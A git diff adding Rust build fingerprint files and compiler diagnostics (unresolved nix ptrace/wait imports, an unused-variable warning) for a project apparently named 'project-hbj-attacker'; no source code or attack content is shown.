+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":17672942494452627365,"path":4942398508502643691,"deps":[[3054597201326428407,"iced_x86",false,9862943459092961479],[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021],[14034831750265444586,"ctor",false,15755893537085299923],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..c55987e
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/dep-test-lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/dep-test-lib-project_hbj_attacker
new file mode 100644
index 0000000..024be49
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/dep-test-lib-project_hbj_attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/test-lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/test-lib-project_hbj_attacker
new file mode 100644
index 0000000..6c14fe3
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/test-lib-project_hbj_attacker
@@ -0,0 +1 @@
+c04885eff372912f
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/test-lib-project_hbj_attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/test-lib-project_hbj_attacker.json
new file mode 100644
index 0000000..7b9ea78
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/test-lib-project_hbj_attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":1436332732506357817,"profile":3316208278650011218,"path":10763286916239946207,"deps":[[3054597201326428407,"iced_x86",false,9862943459092961479],[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-8ea09dd0e71f5ec6/dep-test-lib-project_hbj_attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/bin-project-hbj-attacker
new file mode 100644
index 0000000..34c0e37
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/bin-project-hbj-attacker
@@ -0,0 +1 @@
+8eb4c0f08a3c9543
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..fef95d2
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":17672942494452627365,"path":4942398508502643691,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..5c54f74
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-93e4ff1eedef5ef2/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/dep-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/dep-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..9d41219
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/dep-test-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/test-bin-project-hbj-attacker
new file mode 100644
index 0000000..500b9ac
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/test-bin-project-hbj-attacker
@@ -0,0 +1 @@
+13e27bcc3fd6e881
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/test-bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/test-bin-project-hbj-attacker.json
new file mode 100644
index 0000000..7eddf03
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/test-bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":3316208278650011218,"path":4942398508502643691,"deps":[[3054597201326428407,"iced_x86",false,9862943459092961479],[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-a64302973ba63c21/dep-test-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/dep-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/dep-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..5c54f74
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/dep-test-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/output-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/output-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..993ed40
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/output-test-bin-project-hbj-attacker
@@ -0,0 +1,5 @@
+{"$message_type":"diagnostic","message":"unresolved import `nix::sys::ptrace`","code":{"code":"E0432","explanation":"An import was unresolved.\n\nErroneous code example:\n\n```compile_fail,E0432\nuse something::Foo; // error: unresolved import `something::Foo`.\n```\n\nIn Rust 2015, paths in `use` statements are relative to the crate root. To\nimport items relative to the current and parent modules, use the `self::` and\n`super::` prefixes, respectively.\n\nIn Rust 2018 or later, paths in `use` statements are relative to the current\nmodule unless they begin with the name of a crate or a literal `crate::`, in\nwhich case they start from the crate root. As in Rust 2015 code, the `self::`\nand `super::` prefixes refer to the current and parent modules respectively.\n\nAlso verify that you didn't misspell the import name and that the import exists\nin the module from where you tried to import it. Example:\n\n```\nuse self::something::Foo; // Ok.\n\nmod something {\n pub struct Foo;\n}\n# fn main() {}\n```\n\nIf you tried to use a module from an external crate and are using Rust 2015,\nyou may have missed the `extern crate` declaration (which is usually placed in\nthe crate root):\n\n```edition2015\nextern crate core; // Required to use the `core` crate in Rust 2015.\n\nuse core::any;\n# fn main() {}\n```\n\nSince Rust 2018 the `extern crate` declaration is not required and\nyou can instead just `use` it:\n\n```edition2018\nuse core::any; // No extern crate required in Rust 2018.\n# fn main() {}\n```\n"},"level":"error","spans":[{"file_name":"src/main.rs","byte_start":5,"byte_end":21,"line_start":2,"line_end":2,"column_start":5,"column_end":21,"is_primary":true,"text":[{"text":"use nix::sys::ptrace;","highlight_start":5,"highlight_end":21}],"label":"no `ptrace` in `sys`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"found an item that was configured out","code":null,"level":"note","spans":[{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs","byte_start":1306,"byte_end":1324,"line_start":79,"line_end":79,"column_start":8,"column_end":26,"is_primary":false,"text":[{"text":" #![feature = \"ptrace\"]","highlight_start":8,"highlight_end":26}],"label":"the item is gated behind the `ptrace` feature","suggested_replacement":null,"suggestion_applicability":null,"expansion":null},{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs","byte_start":1365,"byte_end":1371,"line_start":81,"line_end":81,"column_start":13,"column_end":19,"is_primary":true,"text":[{"text":" pub mod ptrace;","highlight_start":13,"highlight_end":19}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0432]\u001b[0m\u001b[0m\u001b[1m: unresolved import `nix::sys::ptrace`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:2:5\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m2\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0muse nix::sys::ptrace;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^^^^^^^^^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mno `ptrace` in `sys`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;10mnote\u001b[0m\u001b[0m: found an item that was configured out\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0m/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs:81:13\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m79\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m #![feature = \"ptrace\"]\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m------------------\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12mthe item is gated behind the `ptrace` feature\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m80\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m #[allow(missing_docs)]\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m81\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m pub mod ptrace;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;10m^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unresolved import `nix::sys::wait`","code":{"code":"E0432","explanation":"An import was unresolved.\n\nErroneous code example:\n\n```compile_fail,E0432\nuse something::Foo; // error: unresolved import `something::Foo`.\n```\n\nIn Rust 2015, paths in `use` statements are relative to the crate root. To\nimport items relative to the current and parent modules, use the `self::` and\n`super::` prefixes, respectively.\n\nIn Rust 2018 or later, paths in `use` statements are relative to the current\nmodule unless they begin with the name of a crate or a literal `crate::`, in\nwhich case they start from the crate root. As in Rust 2015 code, the `self::`\nand `super::` prefixes refer to the current and parent modules respectively.\n\nAlso verify that you didn't misspell the import name and that the import exists\nin the module from where you tried to import it. Example:\n\n```\nuse self::something::Foo; // Ok.\n\nmod something {\n pub struct Foo;\n}\n# fn main() {}\n```\n\nIf you tried to use a module from an external crate and are using Rust 2015,\nyou may have missed the `extern crate` declaration (which is usually placed in\nthe crate root):\n\n```edition2015\nextern crate core; // Required to use the `core` crate in Rust 2015.\n\nuse core::any;\n# fn main() {}\n```\n\nSince Rust 2018 the `extern crate` declaration is not required and\nyou can instead just `use` it:\n\n```edition2018\nuse core::any; // No extern crate required in Rust 2018.\n# fn main() {}\n```\n"},"level":"error","spans":[{"file_name":"src/main.rs","byte_start":37,"byte_end":41,"line_start":3,"line_end":3,"column_start":15,"column_end":19,"is_primary":true,"text":[{"text":"use nix::sys::wait::waitpid;","highlight_start":15,"highlight_end":19}],"label":"could not find `wait` in `sys`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"found an item that was configured out","code":null,"level":"note","spans":[{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs","byte_start":2793,"byte_end":2812,"line_start":180,"line_end":180,"column_start":8,"column_end":27,"is_primary":false,"text":[{"text":" #![feature = \"process\"]","highlight_start":8,"highlight_end":27}],"label":"the item is gated behind the `process` feature","suggested_replacement":null,"suggestion_applicability":null,"expansion":null},{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs","byte_start":2826,"byte_end":2830,"line_start":181,"line_end":181,"column_start":13,"column_end":17,"is_primary":true,"text":[{"text":" pub mod wait;","highlight_start":13,"highlight_end":17}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0432]\u001b[0m\u001b[0m\u001b[1m: unresolved import `nix::sys::wait`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:3:15\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m3\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0muse nix::sys::wait::waitpid;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mcould not find `wait` in `sys`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;10mnote\u001b[0m\u001b[0m: found an item that was configured out\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0m/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs:181:13\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m180\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m #![feature = \"process\"]\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m-------------------\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12mthe item is gated behind the `process` feature\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m181\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m pub mod wait;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;10m^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unresolved import `nix::unistd::Pid`","code":{"code":"E0432","explanation":"An import was unresolved.\n\nErroneous code example:\n\n```compile_fail,E0432\nuse something::Foo; // error: unresolved import `something::Foo`.\n```\n\nIn Rust 2015, paths in `use` statements are relative to the crate root. To\nimport items relative to the current and parent modules, use the `self::` and\n`super::` prefixes, respectively.\n\nIn Rust 2018 or later, paths in `use` statements are relative to the current\nmodule unless they begin with the name of a crate or a literal `crate::`, in\nwhich case they start from the crate root. As in Rust 2015 code, the `self::`\nand `super::` prefixes refer to the current and parent modules respectively.\n\nAlso verify that you didn't misspell the import name and that the import exists\nin the module from where you tried to import it. Example:\n\n```\nuse self::something::Foo; // Ok.\n\nmod something {\n pub struct Foo;\n}\n# fn main() {}\n```\n\nIf you tried to use a module from an external crate and are using Rust 2015,\nyou may have missed the `extern crate` declaration (which is usually placed in\nthe crate root):\n\n```edition2015\nextern crate core; // Required to use the `core` crate in Rust 2015.\n\nuse core::any;\n# fn main() {}\n```\n\nSince Rust 2018 the `extern crate` declaration is not required and\nyou can instead just `use` it:\n\n```edition2018\nuse core::any; // No extern crate required in Rust 2018.\n# fn main() {}\n```\n"},"level":"error","spans":[{"file_name":"src/main.rs","byte_start":56,"byte_end":72,"line_start":4,"line_end":4,"column_start":5,"column_end":21,"is_primary":true,"text":[{"text":"use nix::unistd::Pid;","highlight_start":5,"highlight_end":21}],"label":"no `Pid` in `unistd`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"found an item that was configured out","code":null,"level":"note","spans":[{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs","byte_start":3695,"byte_end":3714,"line_start":159,"line_end":159,"column_start":4,"column_end":23,"is_primary":false,"text":[{"text":"#![feature = \"process\"]","highlight_start":4,"highlight_end":23}],"label":"the item is gated behind the `process` feature","suggested_replacement":null,"suggestion_applicability":null,"expansion":null},{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs","byte_start":3945,"byte_end":3948,"line_start":165,"line_end":165,"column_start":12,"column_end":15,"is_primary":true,"text":[{"text":"pub struct Pid(pid_t);","highlight_start":12,"highlight_end":15}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0432]\u001b[0m\u001b[0m\u001b[1m: unresolved import `nix::unistd::Pid`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:4:5\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m4\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0muse nix::unistd::Pid;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^^^^^^^^^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mno `Pid` in `unistd`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;10mnote\u001b[0m\u001b[0m: found an item that was configured out\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0m/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs:165:12\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m159\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m#![feature = \"process\"]\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m-------------------\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12mthe item is gated behind the `process` feature\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m...\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m165\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub struct Pid(pid_t);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;10m^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"aborting due to 3 previous errors","code":null,"level":"error","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror\u001b[0m\u001b[0m\u001b[1m: aborting due to 3 previous errors\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"For more information about this error, try `rustc --explain E0432`.","code":null,"level":"failure-note","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1mFor more information about this error, try `rustc --explain E0432`.\u001b[0m\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/test-bin-project-hbj-attacker
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/test-bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/test-bin-project-hbj-attacker.json
new file mode 100644
index 0000000..97f5c73
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/test-bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":3316208278650011218,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,664901908625290867]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-b1d345c5490fb68e/dep-test-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/dep-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/dep-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..efbe43f
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/dep-test-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/output-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/output-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..58193b3
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-b90d88b1484a19ce/output-test-bin-project-hbj-attacker
@@ -0,0 +1,6 @@
+{"$message_type":"diagnostic","message":"value assigned to `dlopen_offset` is never read","code":{"code":"unused_assignments","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":1889,"byte_end":1902,"line_start":57,"line_end":57,"column_start":13,"column_end":26,"is_primary":true,"text":[{"text":" let mut dlopen_offset: u64 = 0;","highlight_start":13,"highlight_end":26}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"maybe it is overwritten before being read?","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"`#[warn(unused_assignments)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: value assigned to `dlopen_offset` is never read\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:57:13\u001b[0m\n\u001b[0m 